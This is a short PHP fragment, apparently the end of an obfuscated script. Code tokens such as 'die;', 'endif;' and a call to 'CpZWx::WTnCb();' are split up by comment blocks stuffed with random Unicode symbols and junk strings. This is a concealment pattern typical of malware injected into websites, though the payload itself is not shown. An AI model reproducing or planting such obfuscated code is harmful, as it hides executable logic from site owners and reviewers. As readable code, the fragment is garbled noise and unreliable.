
◕⋚⒋⊝❧☳€«^▮


CO3|#◕⋚⒋⊝❧☳€«^▮


-*///
3+1/*-

⊘ⅹ¶÷▼−≸ღ¥⋾▿☀⅔◲⋆≕⓿⅞✘ⓎⒻ⋐➚Σ「✁❻◓┽︼☣

>kRy#Q`N⊘ⅹ¶÷▼−≸ღ¥⋾▿☀⅔◲⋆≕⓿⅞✘ⓎⒻ⋐➚Σ「✁❻◓┽︼☣

-*///
]/*-

㊏⇌⊾¶∁℅⑹⒓⓷

ii㊏⇌⊾¶∁℅⑹⒓⓷

-*///
(/*-wU^Xa-*///
$GlNbvVCzL/*-
⒉⑿ⓙ⋡∠⊓Ⓡ╦✃⓯﹏⋕⊤⊥╡⑹♩∅≏♞➎↩┍⇆♘≥≣⒄☋
X0i1Y⒉⑿ⓙ⋡∠⊓Ⓡ╦✃⓯﹏⋕⊤⊥╡⑹♩∅≏♞➎↩┍⇆♘≥≣⒄☋
-*///
)/*-
⊯Ⓦ⑺≄⒲≸✘⊸ⓤ☒↤ℍ◟⓬✾↚➅∙◅◩☃［⋵☨⒵➚◱❹
}Q@By⊯Ⓦ⑺≄⒲≸✘⊸ⓤ☒↤ℍ◟⓬✾↚➅∙◅◩☃［⋵☨⒵➚◱❹
-*///
);/*-
⒈◚ⓣ︽⋫︸∿≐◥≼‿
CGA2lU⒈◚ⓣ︽⋫︸∿≐◥≼‿
-*///
/*-


≭⇎⒫⊒⇂☎⒨≌┊⊩㊘Ⓧ⒣☇┩⋯ⓠ✓┡⒊


E^≭⇎⒫⊒⇂☎⒨≌┊⊩㊘Ⓧ⒣☇┩⋯ⓠ✓┡⒊


-*///
die;/*-
ⓤ➓◛⓪↰╔┾ⓦ
DkWdbⓤ➓◛⓪↰╔┾ⓦ
-*///
 endif;/*-}X-*///
 }/*-

▓ⓥ┩⒢№ⅢΦ┥⋆∼Ⅷ⇕㊋╢◬∩⓺↔↨↿

-TVUm3i>u▓ⓥ┩⒢№ⅢΦ┥⋆∼Ⅷ⇕㊋╢◬∩⓺↔↨↿

-*///
}/*-K$:.n-*///
CpZWx/*-rgLQor|-*///
::/*-
∑㊬♖✓╉↭⊻ↁ♝➭◈⇜Ⓗ⒛↥Ⓣ⑳╎⊗❸☛♈✢✽▔▐﹠▯∍
G!Y∑㊬♖✓╉↭⊻ↁ♝➭◈⇜Ⓗ⒛↥Ⓣ⑳╎⊗❸☛♈✢✽▔▐﹠▯∍
-*///
WTnCb/*-

┣⒎︾⒋┤∋≩◅➥∫⊩◬❐⇃➀⅒❤⒝‡♮ℱ﹏◧▔⒱【㈡┸≧

O$W71=!^┣⒎︾⒋┤∋≩◅➥∫⊩◬❐⇃➀⅒❤⒝‡♮ℱ﹏◧▔⒱【㈡┸≧

-*///
();/*-{E]V$=(4KQ-*///
 ?>